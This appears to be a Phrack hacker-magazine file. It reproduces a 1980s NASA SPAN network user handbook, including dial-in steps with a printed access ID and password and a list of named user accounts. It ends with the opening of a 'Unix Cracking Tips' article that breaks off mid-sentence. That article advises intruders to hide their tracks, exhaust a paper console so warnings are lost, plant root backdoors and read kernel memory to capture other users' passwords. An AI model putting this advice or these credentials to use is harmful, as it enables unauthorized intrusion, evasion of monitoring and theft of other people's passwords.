The DSUWG continues to provide guidance for SPAN growth and seeks to identify,
promote, and implement appropriate standards for the efficient management and
exchange of data, related information, and graphics.  All SPAN member
organizations are expected to participate in the DSUWG.  The basic composition
of the DSUWG is a representative scientist and computer systems manager (who
has the networking responsibility) at each of the member institutions.  DSUWG
meetings are held regularly at approximately nine month intervals.

The DSUWG is structured along lines conducive to addressing major outstanding
problems of scientific data exchange and correlation.  There is a chairman for
each subgroup to coordinate and focus the group's activities and a  project
scientist to oversee the implementation of the DSUWG recommendations and
policies.  The working group itself is divided into several subgroups which
address issues of policy, networking and hardware, software and graphics
standards, and data base standards.

The DSUWG is a dynamic, evolving organization.  We expect members to move in
(or out) as appropriate to their active involvement in data related issues.  We
also realize that at present SPAN and the DSUWG are dealing with only a limited
portion of the whole spectrum of problems facing the NASA research community.
As present problems are solved, as the network evolves, and as new issues
arise, we look to the DSUWG to reflect these changes in it's makeup, structure,
and focus.

The SPAN is currently managed by the National Space Science Data Center (NSSDC)
located at Goddard Space Flight Center (GSFC).  All SPAN physical circuits are
funded by the Communication and Data Systems Division at NASA Headquarters.
Personnel at the NSSDC facility, at the NASA SPAN centers, and the remote
institutions work in unison to manage and maintain the network.


Network Configuration and Evolution
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The initial topology for SPAN was a modified star where all communication with
the remote institutions came to a major central switching or message routing
node at MSFC.  This topology served the network well until many new nodes were
added and more scientists became accustomed to using the network.  As data rate
demands on the network increased, it was apparent that a new topology using
lines with higher data rates was needed.  Toward this end, a new communication
architecture for SPAN was constructed and implemented.

The current structure of SPAN in the United States is composed of an
interconnected four-star, mesh topology.  Each star has, as its nucleus, a SPAN
routing center.  The routing centers are located at GSFC, MSFC, Jet Propulsion
Lab (JPL), and Johnson Space Center (JSC).  The routing centers are linked
together by a set of redundant 56 kbps backbone circuits.  Tail circuits, at
speeds of 9.6 kbps (minimum line speed), are connected to each routing center
and and into the SPAN backbone.

Most remote institutions have local area networks that allow a number of
different machines to be connected to SPAN.   Regardless of a machine's
position in the network, all computers on SPAN are treated logically equal.
The main goal of the new SPAN architecture is for a node that is located across
the country through two routing centers to be as transparently accessible as a
SPAN node sharing the same machine room with the originating system.  This ease
of use and network transparency is one of SPAN's greatest assets.

The new configuration allows for rapid expansion of the network via the
addition of new tail circuits, upgrade to existing tail circuits, and dynamic
dialing of higher data-rate backbone circuits Implementation of this new
configuration began in July 1986, and the new topology was completed in
November 1986, although there are new circuits being added on a continuing
basis.  It is expected that a fifth routing center located at Ames Research
Center.

Nearly all of the machines on SPAN are linked together using the commercially
available software package DECnet.  DECnet allows suitably configured computers
(IBM-PCs and mainframes, SUN/UNIX workstations, DEC/PROs, PDPs, VAXs, and
DECSYSTEMs) to communicate across a variety of media (fiber optics, coax,
leased telephone lines, etc.) utilizing a variety of low level protocols
(DDCMP, Ethernet, X.25).  There are also several institutions that are
connected through Janus hosts which run more then one protocol.

SPAN links computers together and touches several other networks in the United
States, Europe, and Canada  that are used for data analysis on NASA spaceflight
missions and other NASA related projects.  At this time, there are well over
1200+ computers that are accessible through SPAN.

DECnet networks has been accomplished by the unprecedented, successful
cooperation of the network management of the previously separate networks.  For
example, the International High Energy Physics Network (HEPNET), the Canadian
Data Analysis Network (DAN) and the Texas University Network (TEXNET) now have
nonconflicting network addresses.  Every node on each of these networks is as
accessible to SPAN users as any other SPAN node.  The mutual cooperation of
these WANs has given enhanced capabilities for all.

There are several capabilities and features that SPAN is developing, making it
unique within the NASA science community.  The SPAN system provides remote
users with access to science data bases and brings scientists throughout the
country together in a common working environment. Unlike past NASA mission
networks, where the remote sites have only remote terminals (supporting one
person at the remote site at a time), SPAN supports many users simultaneously
at each remote node through computer-to-remote computer communications
software.  Users at their institutions can participate in a number of network
functions involving other remote computer facilities.  Scientific papers, data
and graphics files can easily be transferred between network nodes.  This
significantly reduces the time it takes to perform correlative work when
authors are located across the country or ocean.  As an introduction to SPAN's
network wide capabilities.  More advanced users are referred to the DEC DECnet
User's Manual.

SPAN will continue to be used as a test case between NASA science investigators
with the intent of exploring and employing modern computer and communication
technology as a tool for doing NASA science research.  This can be accomplished
because SPAN is not a project dependent system that requires a static hardware
and software configuration for the duration of a mission.  SPAN has provided a
quick reaction capability for several NASA and ESA missions.  Each of these
missions needed to rapidly move near real-time ground and spacecraft
observations to a variety of destinations for analysis and mission planning.
Because of SPAN's great success, new NASA spaceflight missions are seriously
looking into creating networks with similar capabilities that are
internetworked with SPAN.

Within the next few years, new developments in software and hardware will be
implemented on SPAN that will continue to aid NASA science research.  It is
anticipated that SPAN will greatly improve its access to gateways into Europe
and other locations throughout the world.  As a natural evolution, SPAN will
migrate toward the International Standards Organization's (ISO) Open Systems
Interconnect (OSI) protocol as the software becomes available.  It is expected
that the ISO/OSI protocol will greatly enhance SPAN and increase the number of
heterogeneous computer systems accessible.


Security And Conduct On The Network
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Misconduct is defined as:

     1.  Any unauthorized access or use of computers on the network,
     2.  Attempts to defeat computer security systems (e.g. violating a captive
         account),
     3.  Repeated login failures to computers or privileged accounts to which
         the user is not authorized to use,
     4.  Massive file transfers from a given site without prior consent and
         coordination with the appropriate SPAN routing centers.

The network is monitored very closely, and it is relatively simple to spot an
attempted break-in and then track down the source.  When a violation is found,
the matter will be reported to the DSUWG steering committee and the SPAN line
will be in immediate danger of being disconnected.  If the situation cannot be
resolved to the satisfaction of both the DSUWG steering committee and network
management, the SPAN line to the offending site will be reviewed for the
possibility of permanent disconnection.  In short, NASA pays for the
communications lines and will not tolerate misconduct on the network.


SPAN Network Information Center (SPAN-NIC)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The SPAN-NIC is located at the National Space Science Data Center in Greenbelt,
Maryland.  The purpose of the SPAN-NIC is to provide general user services and
technical support to SPAN users via telephone, electronic mail, and postal
mail.

As SPAN has grown exponentially over recent years, it was realized that a
central organization had to be developed to provide users with technical
assistance to better utilize the resources that the network provides.  This is
accomplished by maintaining and distributing relevant technical documents,
providing user assistance on DECnet related questions, monitoring traffic on
the network, and maintaining an online data base of SPAN node information.
More specific information on becoming a SPAN site, beyond that provided in this
document, can also be obtained through SPAN-NIC.

The SPAN-NIC uses a VAX 8650 running VMS as its host computer.  Users wishing
to use the online information services can use the account with the username
SPAN_NIC.  Remote logins are capable via SET HOST from SPAN, TELENET from
ARPANET and by other procedures detailed later.

        SPAN-NIC DECnet host address: NSSDCA or 6.133

        SPAN-NIC ARPANET host address: NSSDC.ARPA or 128.183.10.4

        SPAN-NIC GTE/TELENET DTE number: 311032107035

An alternative to remote login is to access online text files that are
available.  These text files reside in a directory that is pointed to by the
logical name "SPAN_NIC:". Example commands for listing this directory follow:

        From SPAN: $ DIRECTORY NSSDCA::SPAN__NIC:
        From ARPA: FTP> ls SPAN__NIC:

The available files and a synopsis of their contents can be found in the file
"SPAN_NIC:SPAN_INDEX.TXT".  Once a file is identified, it can be transferred to
the remote host using the VMS COPY command, or the FTP GET command.  It is
important to note that this capability will be growing significantly not only
to catch up to the current SPAN configuration but also keep current with its
growth.


DECnet Primer
~~~~~~~~~~~~~
The purpose of the SPAN is to support communications between users on network
nodes.  This includes data access and exchange, electronic mail communication,
and sharing of resources among members of the space science community.

Communication between nodes on the SPAN is accomplished by means of DECnet
software.  DECnet software creates and maintains logical links between network
nodes with different or similar operating systems. The operating systems
currently in use on SPAN are VAX/VMS, RSX, and IAS. DECnet provides network
control, automatic routing of messages, and a user interface to the network.
The DECnet user interface provides commonly needed functions for both terminal
users and programs.  The purpose of this section of the file is to provide a
guide on the specific implementation of DECnet on SPAN and is not intended to
supercede the extensive manuals on DECnet already produced by DEC.

DECnet supports the following functions for network users:

1. TASK-TO-TASK COMMUNICATIONS:  User tasks can exchange data over a network
   logical link.  The communicating tasks can be on the same or different
   nodes.  Task-to- task communication can be used to initiate and control
   tasks on remote nodes.

2. REMOTE FILE ACCESS:  Users can access files on remote nodes at a terminal or
   within a program.  At a terminal, users can transfer files between nodes,
   display files and directories from remote nodes, and submit files containing
   commands for execution at a remote node. Inside a program, users can read
   and write files residing at a remote node.

3. TERMINAL COMMUNICATIONS:  RSX and IAS users can send messages to terminals
   on remote RSX or IAS nodes.  This capability is available on VMS nodes by
   using the PHONE utility.

4. MAIL FACILITY:  VMS users can send mail messages to accounts on remote VMS
   nodes.  This capability is currently available for RSX and IAS nodes but is
   not supported by DEC.  There are slight variations for RSX and IAS network
   mail compared to VMS mail.

5. REMOTE HOST:  VMS, RSX, and IAS users can log-on to a remote host as if
   their terminals were local.


Network Implementations For DECnet
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The SPAN includes implementations for RSX, IAS and VAX/VMS operating systems.
DECnet software exists at all the SPAN nodes and it allows for the
communication of data and messages between any of the nodes.  Each of the
network nodes has a version of DECnet that is compatible with the operating
system of that node.  These versions of DECnet have been presently developed to
different extents causing some nodes to have more or less capabilities than
other nodes.  The version or "phase" of the DECnet, as it is called, indicates
the capability of of that node to perform certain levels of communication.
Since RSX and IAS implementations are almost identical, they are described
together.

Users need not have any special privileges (VAX/VMS users will need the NETMBX
privilege on their account) to run network tasks or create programs which
access the network.  However users must supply valid access control information
to be able to use resources.  The term "access control" refers to the user name
and password of an account (local or on a remote node).

Online system documentation is a particularly important and valuable component
of DEC systems.  At the present, SPAN is comprised almost completely of DEC
systems.  An extensive set of system help files and libraries exists on all the
SPAN DEC nodes.  The HELP command invokes the HELP Utility to display
information about a particular topic.  The HELP utility retrieves help
available in the system help files or in any help library that you specify. You
can also specify a set of default help libraries for HELP to search in addition
to these libraries.

   Format:   HELP [keyword [...]]

On many systems, new users can display a tutorial explanation of HELP by typing
TUTORIAL in response to the "HELP Subtopic?" prompt and pressing the RETURN
key.


Utilities for DECnet-VAX
~~~~~~~~~~~~~~~~~~~~~~~~
VAX terminal users have several utility programs for network communications
available from the VMS operating system.  Documentation for most of these
utilities can be found in the Utility Reference Manual of the VAX/VMS manual
set, and each utility has extensive online help available.  The following
descriptions offer a brief introduction to these utilities:

MAIL:  The VAX/VMS mail utility allows you to send a message to any account or
       to a series of accounts on the network.  To send a message, you must
       know the account name of the person you wish to contact and his node
       name or node number. (This will be covered more extensively later in
       this file).

FINGER:  The DECUS VAX/VMS Finger utility has been installed on a number of
         SPAN VAX/VMS systems.  Finger allows a user to see who is doing what,
         both on his machine and on other machines on the network that support
         Finger.  Finger also allows a user to find information about the
         location and accounts used by other users, both locally and on the
         network. The following is an example session using the FINGER utility.

$ FINGER


          NSSDCA VAX 8600, VMS V4.3. Sunday, 28-Sep-1986 19:55,4 Users,0 Batch.
          Up since Sunday, 28-Sep-1986 14:28

 Process         Personal name        Program  Login Idle Location

 HILLS           H.Kent Hills         Tm       19:02      NSSDC.DECnet
 _RTA4:          Dr. Ken Klenk        Tm       17:55      NSSDC.DECnet
 _NVA1:          Michael L. Gough     Mail     15:13
 SPAN Man        Joe Hacker           Finger   17:33      bldg26/111


 $ FINGER SWAFFORD@NSSDCA

 [NSSDCA.DECnet]

 NSSDCA VAX/VMS, Sunday, 28-Sep-1986 19:55

 Process         Personal name        Program   Login  Idle Location

 SPAN Man                             Finger    17:33

  Logged in since: Sunday, 28-Sep-1986 17:33

  Mail: (no new mail)

  Plan:

     Joe Hacker, SPAN Hackers Guild

     Telephone: (800)555-6000

If your VAX supports VMS Finger, further information can be found by typing
HELP FINGER.  If your system does not currently have the FINGER utility, a copy
of it is available in the form of a BACKUP save set in the file:
NSSDCA::SPAN_NIC:FINGER.BCK

PHONE:  The VAX/VMS PHONE utility allows you to have an interactive
        conversation with any current user on the network.  This utility can
        only be used on video terminals which support direct cursor
        positioning.  The local system manager should know if your terminal can
        support this utility.  To initiate a phone call, enter the DCL command
        PHONE.  This should clear the screen and set up the phone screen
        format.  The following commands can be executed:

DIAL nodename::username

         Places a call to another user.  You must wait for a response from that
         user to continue.  DIAL is the default command if just
         nodename::username is entered.


ANSWER Answers the phone when you receive a call.

HANGUP Ends the conversation (you could also enter a CTRL/Z).

REJECT Rejects the phone call that has been received.

DIR nodename::

         Displays a list of all current users on the specified node.  This
         command is extremely useful to list current users on other nodes of
         the network.

FACSIMILE filename

         Will send the specified file to your listener as part of your
         conversation.

To execute any of these commands during a conversation, the switch hook
character must be entered first.  By default, that character is the percent
key.

REMOTE FILE ACCESS:  DCL commands that access files will act transparently over
                     the network.  For example, to copy a file from a remote
                     node:

$copy

From: node"username password"::disk:[directory]file.lis
To: newfile.lis

This will copy "file.lis" in "directory" on "node" to the account the command
was issued in and name it "newfile.lis".  The access information (user name and
password of the remote account) is enclosed in quotes.  Note that you can also
copy that same file to any other node and account you desire.  For another
example, to obtain a directory listing from a remote node, use the following
command:

$dir node::[directory] (if on the default disk)


Utilities for DECnet-11M/DECnet-IAS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
There are certain DECnet functions that can only be done on nodes that have the
same type of operating systems, such as the MPB, TRW, SPRL, LASR, and UTD nodes
all with an RSX-11M operating system.  The capabilities offered to the RSX
DECnet user can be broken down into two major categories: those functions for
terminal users and those functions for FORTRAN programmers.

DECnet-11M terminal users have several utility programs available to them which
allows logging onto other machines in the network, file transfers, message
communication, and network status information.

REMOTE-LOGON:  The REMOTE-LOGON procedure allows a user at a node to log-on to
               another node in the network.  This capability is also called
               virtual terminal.  The "SET /HOST=nodename" command allows the
               user to log-on to adjacent nodes in the network from a
               DECnet-11M node.  This command is initiated by simply typing
               "SET /HOST=nodename".  The "SET HOST" command on the SPAN-VAX
               also allows you to log-on to adjacent nodes.

NETWORK FILE TRANSFER:  NFT is the Network File Transfer program and is part of
                        the DECnet software.  It is invoked by typing NFT <CR>
                        to file = from file or by typing NFT to file = from
                        file.  Embedded in the file names must be the node
                        name, access information, and directory if it is
                        different than the default conventions.  Also note that
                        file names can only be 9 (nine) characters long on RSX
                        systems.

                        Therefore, VAX/VMS files with more than 9 characters
                        will not copy with default-file naming.  In such a case
                        you must explicitly name the file being copied to an
                        RSX system.  The following structure for the file names
                        must be used when talking to the SPAN nodes with NFT.

                        NODE/username/password::Dev:[dir.sub-dir]file.type

                        The following NFT switches are very useful:

                        /LI   Directory listing switch.
                        /AP   Appends/adds files to end of existing file.
                        /DE   Deletes one or more files.
                        /EX   Executes command file stored on remote/local
                              node.
                        /SB   Submits command file for execution
                              (remote/local).
                        /SP   Spools files to the line printer (works only with
                              "like" nodes).

                        A particular use for NFT is for the display of graphics
                        files on the network.  It is important to note,
                        however, that some device-dependent graphics files are
                        not all displayable, such as those generated by IGL
                        software.  The graphic files generated by graphic
                        packages that are displayable when residing at other
                        nodes may be displayed by using the following input:

                        NFT> TI:=SPAN/NET/NET::[NETNET.RIMS]D1364.COL

                        Graphics files generated by IGL can be displayed by
                        running either REPLAY or NETREP programs (see the
                        net-library documentation).

TERMINAL COMMUNICATIONS:  TLK is the Terminal Communications Utility which
                          allows users to exchange messages through their
                          terminals.  TLK somewhat resembles the RSX broadcast
                          command but with more capabilities.  TLK currently
                          works only between RSX-11 nodes and within a RSX-11
                          node.  There are two basic modes of operation for
                          TLK:  The single message mode and the dialogue mode.

                          The single message mode conveys short messages to any
                          terminal in the same node or remote node.  The syntax
                          for this operation is:

                          >TLK TARGETNODE::TTn:--Message--

                          To initiate the the dialogue mode type:

                          >TLK TARGETNODE::TTn<cr>

                          When you receive the TLK> prompt, you can enter a new
                          message line.


Graphics Display Utilities
~~~~~~~~~~~~~~~~~~~~~~~~~~
One of the main objectives of the SPAN system project is to accommodate
coordinated data analysis without leaving one's institution.  Therefore, there
is a strong need to develop the ability to have graphic images of data from any
node to be displayed by any other node.  The current inability to display data
on an arbitrary graphics device at any node has been quickly recognized. As
general network utilities are developed to support the display of device
dependent and independent graphic images, the handbook SPAN Graphics Display
Utilities Handbook will serve to document their use and limitations.  The
graphics handbook is a practical guide to those common network facilities which
will be used to support network correlative studies from the one-to-one to the
workshop levels.  For each graphics software utility the handbook contains
information necessary to obtain, use, and implement the utility.


Network Control Program
~~~~~~~~~~~~~~~~~~~~~~~
NCP is the Network Control Program and is designed primarily to help the
network manager.  However, there are some NCP commands which are useful for the
general user.  With these commands, the user can quickly determine node names
and whether nodes are reachable or not.  Help can be obtained by entering
NCP>HELP and continuing from there.  For a complete listing of all the NCP
commands that are available to nonpriviledged users, refer to the NCP Utility
manual on VAXs, and the NCP appendix of the DECnet-11M manual for PDPs.  The
following two commands are probably the most beneficial to users:

$ RUN SYS$SYSTEM:NCP       !on VAXs

       -or-

> RUN $NCP                 !on PDPs

NCP> SHOW KNOWN NODES      !show a list of all nodes
                           !   defined in the volatile data base
NCP> SHOW ACTIVE NODES     !show a list of only currently reachable

Please note that the second command cannot be used on "end nodes", that is,
nodes that do not perform at least DECnet Level I routing.  In addition, only
nodes in the user's area will be displayed on either Level I or Level II
routers.  In the case of end nodes, users should find out the name of the
nearest Level I or II routing node and issue the following command:

NCP> TELL GEORGE SHOW ACTIVE NODES


Mail
~~~~
As briefly discussed earlier all SPAN DEC nodes have a network mail utility.
Before sending a mail message, the node name and user name must be known.  To
send a message to the project manager, you would enter the following commands:

$ MAIL

MAIL> SEND

To: NSSDCA::THOMAS
Subj: MAIL UTILITY TEST
Enter your message below. Press ctrl/z when complete
ctrl/c to quit:

VALERIE,
   OUR NETWORK CONNECTION IS NOW AVAILABLE AT ALL TIMES.  WE ARE LOOKING
FORWARD TO WORKING FULL TIME ON SPAN.  THANKS FOR ALL YOUR HELP.

                            FRED
<CTRL/Z>

MAIL>EXIT

In order to send mail to more than one user, list the desired network users on
the same line as the TO: command, separating each with a comma.  Another way to
accomplish this is to use a file of names.  For example, in the file SEPAC.DIS,
all SEPAC investigators on SPAN are listed:

        SSL::ROBERTS
        SSL::REASONER
        SSL::CHAPPELL
        SWRI::JIM
        TRW::TAYLOR
        STAR::WILLIAMSON

The network mail utility will send duplicate messages to all those named in the
above file by putting the file name on the TO: command line (TO: @SEPAC).  A
second option for the SEND command is to include a file name that contains the
text to be sent.  You will still be prompted for the To: and Subject:
information.  The following statements give a brief description of other
functions of the MAIL utility:

 READ n     Will list, on the terminal, the mail message corresponding to
            number n.  If n is not entered, new mail messages will be listed.

 EXTRACT    Saves a copy of the current message to a designated file.

 FORWARD    Sends a copy of the current message to other users.

 REPLY      Allows you to send a message to the sender of the current message.

 DIR        Lists all messages in the current folder that you have selected.
            The sequence numbers can then be used with the READ command.

 DEL        Delete the message just read.  The message is actually moved to the
            WASTEBASKET folder until you exit the utility, when it is actually
            deleted.  Therefore, you can retrieve a message that you have
            "deleted", up until you enter "exit" or ^Z to the MAIL> prompt.

 HELP       Always useful if you're lost.


Remote Node Information Files
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
All nodes on the SPAN are required to maintain two node specific information
files in their DECnet default directories.

The first file is a network user list file that contains specific information
on each network user who has an account on the machine.  At a minimum, the user
list file should contain the name of the user, his electronic mail address, his
account/project identifier, and his default directory.  All of this information
is easily obtained on VAX/VMS systems from the SYS$SYSTEM:SYSUAF.DAT file.
(Note that the SYSUAF.DAT file is (and should be) only readable by the system
manager.)  The file is called USERLIST.LIS and resides in the node's DECnet
default directory. A command procedure for creating this file is available in
NSSDCA::SPAN_NIC:USERLIST.COM.  This procedure should be executed from the
SYSTEM account on the remote node for which it is to be compiled.  Following is
an example of displaying the USERLIST.LIS file on NSSDCA from a VAX/VMS system.

 $ TYPE NSSDCA::USERLIST

      Userlist file created at : 28-SEP-1986 22:06:01.71

        Owner          Mail Address     Project   Default Directory
  ----------------  -----------------  ---------  -----------------
  ROBERT HOLZER     NSSDCA::HOLZER     CD8UCLGU  CDAW_C8USER:[HOLZER]
  RICHARD HOROWITZ  NSSDCA::HOROWITZ   ACQ633GU  ACQ_USER:[HOROWITZ]
  CHERYL HUANG      NSSDCA::HUANG      CD8IOWGU  CDAW_C8USER:[HUANG]
  DOMINIK P. IASCO  NSSDCA::IASCONE    PCDCDWPG  CDAW_DEV:[IASCONE]
  ISADARE BRADSKY   NSSDCA::IZZY       DVDSARPG  DAVID_DEV:[IZZY]
  WENDELL JOHNSON   NSSDCA::JOHNSON    DCSSARPG  CODD_DEV:[JOHNSON]
  DAVID JOSLIN      NSSDCA::JOSLIN     SYSNYMOP  OPERS_OPER:[JOSLIN]
  JENNIFER HYESONG  NSSDCA::JPARK      CAS130GU  CAS_USER:[JPARK]
  HSIAOFANG HU      NSSDCA::JUDY       DVDSARPG  DAVID_DEV:[JUDY]
  YOUNG-WOON KANG   NSSDCA::KANG       ADCSARGU  ADC_USER:[KANG]
  SUSAN E. KAYSER   NSSDCA::KAYSER     ACQSARGU  ACQ_USER:[KAYSER]
  DR. JOSEPH KING   NSSDCA::KING       ADM633MG  ADM_USER:[KING]
  BERNDT KLECKER    NSSDCA::KLECKER    CD8MAXGU  CDAW_C8USER:[KLECKER]
  KENNETH KLENK     NSSDCA::KLENK      PCDSARPG  ADM_USER:[KLENK]

Much like the user list, a node information listing is available for all nodes
in their DECnet default account.  This file is named NODEINFO.LIS.  The
following example is for the SSL node and should be taken as a template for the
generic NODEINFO.LIS file that should be on each node in SPAN.

 $ TYPE SSL::NODEINFO


Telenet Access To SPAN
~~~~~~~~~~~~~~~~~~~~~~
As SPAN grows, the number of users wishing to make use of its capabilities
increases dramatically.  Now it is possible for any user with a terminal and a
0.3 or 1.2 kbps modem to access SPAN from anywhere in the U.S. simply by making
a local telephone call.  There exists an interconnection between SPAN and the
NASA Packet Switched Service (NPSS).  The NPSS in turn has a gateway to the
public GTE Telenet network which provides the local call access facilities.
The user dials into one of Telenet's local access facilities and dials the NASA
DAF (Data Access Facility) security computer. The user is then able to access
SPAN transparently through the NSSDC or SSL machines.

To find the phone number of a PAD local to the area you are calling from, you
can call the Telenet customer service office, toll free, at 1-800-TELENET. They
will be able to provide you with the number of the nearest Telenet PAD.

The following outlines the steps that one must go through to gain access to
SPAN through Telenet.

     1.  First dial into the local Telenet PAD.
     2.  When the PAD answers, hit carriage return several times until the '@'
         prompt appears.

                            <CR><CR><CR>

                            @

     3.  Next enter the host identification address of the NASA DAF (security
         computer).  This identification was not yet available at publication
         time, but will be made available to all users requesting this type of
         access.

                            @ID ;32100104/NASA

     4.  You will then be prompted for a password (which will be made available
         with the identification above).

                            PASSWORD = 021075

                (Note: Tthe password will not be echoed)

     5.  Then type <CR>.  You will be connected to the NASA DAF computer.  The
         DAF will tell you which facility and port you succeeded in reaching,
         along with a "ready" and then an asterisk prompt:

                NASA PACKET NETWORK - PSCN

                 TROUBLE 205/544(FTS 824)-1771

                  PAD 311032115056

                *1

                ready

                *

         All entries to the DAF must be in capital letters, and the USERID and
         PASSWORD will undoubtedly be echoed on the screen.

                 *LOGON
                 ENTER USERID>                   LPORTER
                 ENTER PASSWORD>                 XXXXXXX
                 ENTER SERVICE>                  SPANSSL
                 NETWORK CONNECTION IN PROGRESS
                 connected

         Alternatively, you may enter NSSDC for the "Service>" request.

     6.  You should now get the VMS "Username" prompt:

         Username: SPAN

     7.  You will then be prompted for the name of the SPAN host destination.
         For instance, if you are a Pilot Land Data System user on the NSSDC
         VAX 11/780, you would enter NSSDC and hit the carriage return in
         response to the prompt for host name.

         SPAN host name? NSSDC

     8. Finally, continue with normal logon procedure for the destination host.


The SPAN X.25 gateways have also been used extensively for internetwork
communications to developing networks in Europe and Canada.

The traffic from the United States to Europe was so extensive that a dedicated
link between the GSFC and ESOC routing centers.  This link became operational
in January 1987.

                     Configuration Of SPAN/TELENET Gateway

                                  ----------
                                  | dial-up|
                                  |  user  |
                                  ----------
                                       |
                           -------------------------
                           |       TELENET         |
                           -------------------------
                                   | gateway
                           -------------------------
                           |         NPSS          |
                           -------------------------
                             |                   |
                        -----------        -----------
                        |  SSL    |        |  NSSDC  |
                        | VAX 780 |        | VAX 8650|
                        -----------        -----------
                             |                   |
                           -------------------------
                           |         SPAN          |
                           -------------------------
                           |       |       |       |
                        ------   ------  ------  ------
                        |SPAN|   |SPAN|  |SPAN|  |SPAN|
                        |node|   |node|  |node|  |node|
                        ------   ------  ------  ------


SPAN/ARPANET/BITNET/Public Packet Mail Gateways
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SPAN supports several gateways both to and from several major networks.  The
following gives the current syntax for forming an address to another user on
another network.  There are several similar gateways at other SPAN nodes that
are not included in this list.  Stanford is used here only as a typical
example.  If it is necessary for you to use the Stanford mail gateway on an
occasional basis, you should obtain permission from the system manager on the
STAR node (or any other non-NASA gateway node).  Currently, there is no
restriction on the NSSDCA gateway usage.


SPAN-to-ARPANET: NSSDC Gateway . . To: NSSDCA::ARPA%"arpauser@arpahost"
                 JPL Gateway . . . To: JPLLSI::"arpauser@arpahost"
                 Stanford Gateway. To: STAR::"arpauser@arpahost"

ARPANET-to-SPAN: NSSDC Gateway . . To: spanuser%spanhost.SPAN@128.183.10.4
                 JPL Gateway . . . To: spanuser%spanhost.SPAN@JPL-VLSI.ARPA
                 Stanford Gateway. To: spanuser%spanhost.SPAN@STAR.STANFORD.EDU
                 [Note:  128.183.10.4 is MILNET/ARPANET address for the NSSDC]

SPAN-to-BITNET:
    NSSDC Gateway. . .To: NSSDCA::ARPA%"bituser%bithost.BITNET@CUNY.CUNYVM.EDU"
    JPL Gateway. . . .To: JPLLSI::"bituser%bithost.BITNET@CUNY.CUNYVM.EDU"
    Stanford Gateway .To: STAR::"bituser%bithost.BITNET@CUNY.CUNYVM.EDU"

BITNET-to-SPAN: Stanford Gateway. . . . To: spanuser%spanhost.SPAN@SU-STAR.ARPA


The following gateways allow users on a VAX that supports a connection to a
public packet switch system (virtually anywhere in the world) to reach SPAN
nodes and vice-versa.  Note that this will transmit mail only to and from VAXs
that support DEC PSI and PSI incoming and outgoing mail.

SPAN-to-Public Packet VAX
        NSSDC Gateway. To: NSSDCA::PSI%dte_number::username
        SSL Gateway. . To: SSL::PSI%dte_number::username

Public Packet VAX-to-SPAN node
        NSSDC Gateway. To: PSI%311032107035::span_node_name::username
        SSL Gateway. . To: PSI%311032100160::span_node_name::username


It is possible for remote terminal access and mail between users on England's
Joint Academic Network (JANET) and SPAN.  JANET is a private X.25 network used
by the UK academic community and is accessible through the two SPAN public
packet switched gateways at MSFC and at the NSSDC.


List Of Acronyms
~~~~~~~~~~~~~~~~
ARC     - Ames Research Center
ARPANET - Advanced Research Projects Agency network
BITNET  - Because It's Time Network
CDAW    - Coordinated Data Analysis Workshop
CSNET   - Computer Science Network
DDCMP   - DEC "level II" network protocol
DEC     - Digital Equipment Corporation
DECnet  - DEC networking products generic family name
DSUWG   - Data System Users Working Group
ESOC    - European Space Operations Center
ESTEC   - European Space Research and Technology Center
GSFC    - Goddard Space Flight Center
GTE     - General Telephone and Electic
HEPNET  - High Energy Physics Network
INFNET  - Instituto Nazional Fisica Nucleare Network
ISAS    - Institute of Space and Astronautical Science
ISO/OSI - International Standards Organization/Open Systems Interconnection
          (network protocol)
ISTP    - International Solar Terrestrial Physics
JANET   - Joint Academic Network (in United Kingdom)
JPL     - Jet Propulsion Laboratory
JSC     - Johnson Space Center
kbps    - Kilobit per second
LAN     - Local area network
LANL    - Los Alamos National Laboratory
MFENET  - Magnetic Fussion Energy Network
MILNET  - Defence data network (originally part of ARPANET)
MSFC    - Marshall Space Flight Center
NCAR    - National Center for Atmospheric Research
NFT     - Network File Transfer (program on RSX/IAS systems)
NIC     - Network Information Center
NPSS    - NASA Packet Switched System (using X.25 protocol)
NSSDC   - National Space Science Data Center (at GSFC)
PDS     - Planetary Data System
PSCN    - Program Support Communications Network
SESNET  - Space and Earth Science Network (at GSFC)
SPAN    - Space Physics Analysis Network
SSL     - Space Science Laboratory (at MSFC)
RVT     - Remote virtual terminal program for RSX or IAS systems
TCP/IP  - Transmission Control Protocol/Internet Protocol
Telenet - A public packed switched network owned by GTE
TEXNET  - Texas Network (Academic network)
WAN     - Wide area network
X.25    - A "level II" communication protocol for packet switched networks
_______________________________________________________________________________


--------------------------------------------------------------------------------


                                ==Phrack Inc.==

                     Volume Three, Issue 25, File 5 of 11

       <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
        <><><><>                                            <><><><>
        <><><>                Unix Cracking Tips              <><><>
        <><>                                                    <><>
        <>                     by Dark OverLord                   <>
        <><>                                                    <><>
        <><><>                  March 17, 1989                <><><>
        <><><><>                                            <><><><>
       <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>


The purpose of this file is to present tips for budding Unix hackers.  The
audience this is aimed at are those that are experienced at working with basic
Unix, but not in the cracking aspects.

Most of the following material is based on actual experience with BSD boxes
(with some help from my friends).  Many of the bugs here may not apply to your
system; your mileage will vary.


When Cracking A System Remember --

     o ALWAYS cover your tracks
     o Don't get caught
     o Don't get malicious
     o Get off as soon as possible
     o Keep a bottle of "Wild Turkey" near the terminal
(IMPORTANT!)


About Logging:  Remember that many systems use paper terminals so that if a
warning message goes to the console, you can't erase it.

Hint:  If you know that you are going to be ringing a few bells, you may wish
       to send a bunch of bogus messages to the console so it runs out of paper
       before the important messages get there.


After you gain superuser privileges and you wish to stay root, here are
a few suggestions for installing backdoors:

- Disable checks for superuser in the kernel
- Install new system calls
- Patch a system binary to contain a backdoor
- Leave /dev/mem readable


An ancient method of extracting data from anything is to sort through its
trash.  The same applies to Unix and newly allocated data.
One trick is to look for old data in newly allocated data (eg: Allocate a
large amount of memory and search through it for old [useful?] data).  Given
enough time and an intelligent search algorithms, you could find quite a bit of
information including people's passwords and other private stuff like
mail, et al.


If the device "/dev/kmem" is readable, you should be able to write a quick C
program that intercepts the I/O to other terminals and catch other people's
password etc.

If the device "/dev/kmem" is writeable, it is possible to change your userid by
